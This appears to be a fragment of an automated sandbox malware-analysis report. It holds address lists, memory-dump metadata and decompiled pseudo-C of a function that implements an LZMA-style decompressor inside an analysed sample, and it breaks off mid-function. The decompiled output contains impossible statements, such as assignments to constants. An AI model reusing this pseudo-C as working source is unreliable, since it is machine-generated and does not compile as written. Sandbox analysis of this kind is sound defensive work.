                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x00407223

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                  • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                  • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00407128() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
